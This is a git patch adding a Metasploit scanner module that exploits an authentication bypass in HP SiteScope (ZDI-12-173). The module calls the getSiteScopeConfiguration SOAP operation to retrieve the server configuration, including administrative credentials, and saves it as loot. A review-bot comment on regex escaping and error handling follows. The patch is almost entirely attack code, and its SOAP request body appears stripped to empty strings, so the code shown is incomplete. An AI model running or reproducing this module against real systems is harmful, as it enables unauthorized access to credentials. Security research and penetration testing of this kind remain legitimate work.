From 534ab55e5c484644918a2e45ab3b831d0ab6c48f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 5 Sep 2012 12:53:03 +0200
Subject: [PATCH] Added module for ZDI-12-173
---
.../hp_sitescope_getsitescopeconfiguration.rb | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
new file mode 100644
index 0000000000..4465a4a9e8
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -0,0 +1,131 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access',
+ 'Description' => %q{
+ This module exploits an authentication bypass vulnerability in HP SiteScope
+ which allows to retrieve the HP SiteScope configuration, including administrative
+ credentials. It is accomplished by calling the getSiteScopeConfiguration operation
+ available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration
+ is retrieved as a gzipped file containing Java serialization data. This module has
+ been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2.
+ },
+ 'References' =>
+ [
+ #[ 'OSVDB', '' ],
+ [ 'BID', '55269' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ]
+ ],
+ 'Author' =>
+ [
+ 'rgod ', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+
+ ], self.class)
+
+ register_autofilter_ports([ 8080 ])
+ deregister_options('RHOST')
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def run_host(ip)
+ res = send_request_cgi({
+ 'uri' => '/SiteScope/services/APISiteScopeImpl',
+ 'method' => 'GET'})
+
+ if not res
+ print_error("#{rhost}:#{rport} - Unable to connect")
+ return
+ end
+
+ access_configuration
+ end
+
+ def access_configuration
+ print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface")
+
+ data = "" + "\r\n"
+ data << "" + "\r\n"
+ data << "" + "\r\n"
+ data << "" + "\r\n"
+ data << "" + "\r\n"
+ data << ""
+
+ res = send_request_cgi({
+ 'uri' => '/SiteScope/services/APISiteScopeImpl',
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => data,
+ 'headers' => {
+ 'SOAPAction' => '""',
+ }})
+
+ if res and res.code == 200
+
+ if res.headers['Content-Type'] =~ /boundary="(.*)"/
+ boundary = $1
+ end
+ if not boundary or boundary.empty?
+ print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration")
+ return
+ end
+
+ if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/
+ cid = $1
+ end
+ if not cid or cid.empty?
+ print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration")
+ return
+ end
+
+ if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m
+ loot = Rex::Text.ungzip($1)
+ end
+ if not loot or loot.empty?
+ print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration")
+ return
+ end
+
+ path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
+ print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}")
+ print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data")
+ return
+ end
+
+ print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration")
+ end
+
+end
+
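Review bot: The MIME boundary captured from the server's Content-Type header is interpolated unescaped into the regex in `if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m`, so a boundary containing regex metacharacters (e.g. `.`, `+`, `(`) either silently fails to match or raises a RegexpError on that host; `cid` is safe because its capture is restricted to `[A-F0-9]*`, but the boundary should be interpolated as `--#{Regexp.escape(boundary)}`. The `Rex::Text.ungzip($1)` call that follows presumably raises a Zlib error on a body that is not valid gzip rather than returning nil, in which case the `if not loot or loot.empty?` guard never runs; rescuing that error around the call and falling through to the same `print_error` would keep one malformed response from aborting the scan of the remaining hosts. Separately, the four `print_error("#{rhost}#{rport} - Failed ...")` messages omit the `:` that every `print_status` and the "Unable to connect" message use between host and port, e.g. `print_error("#{rhost}:#{rport} - Failed to retrieve the SiteScope Configuration")`.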